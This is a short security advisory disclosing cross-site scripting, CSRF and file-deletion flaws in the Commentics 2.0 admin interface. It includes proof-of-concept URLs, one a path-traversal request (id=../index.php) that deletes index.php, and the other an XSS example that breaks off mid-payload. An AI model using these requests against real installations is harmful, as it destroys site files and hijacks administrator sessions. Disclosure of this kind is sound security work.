#################################################
Commentics 2.0 <= Multiple Vulnerabilities
################################################# Discovered by: Jean Pascal Pereira Vendor information: "Commentics is a free, advanced PHP comment script with many features.
Professionally written and with open source code, its main aims are to be integrable, customizable and secure." Vendor URI: http://www.commentics.org/ ################################################# Issues: Cross Site Scripting, Cross Site Request Forgery / File Deletion Risk-level: High The whole administration interface is prone to several client-side attacks. ------------------------------------- Exploit / Proof Of Concept: (Note that almost every parameter is vulnerable. These are only a few examples.) 1. File deletion vulnerability (deletes index.php): http://localhost/commentics/commentics/comments/[admin_path]/index.php?page=tool_db_backup&action=delete&id=../index.php 2. Cross Site Scripting: http://localhost/commentics/commentics/comments/[admin_path]/index.php?page=edit_page&id=">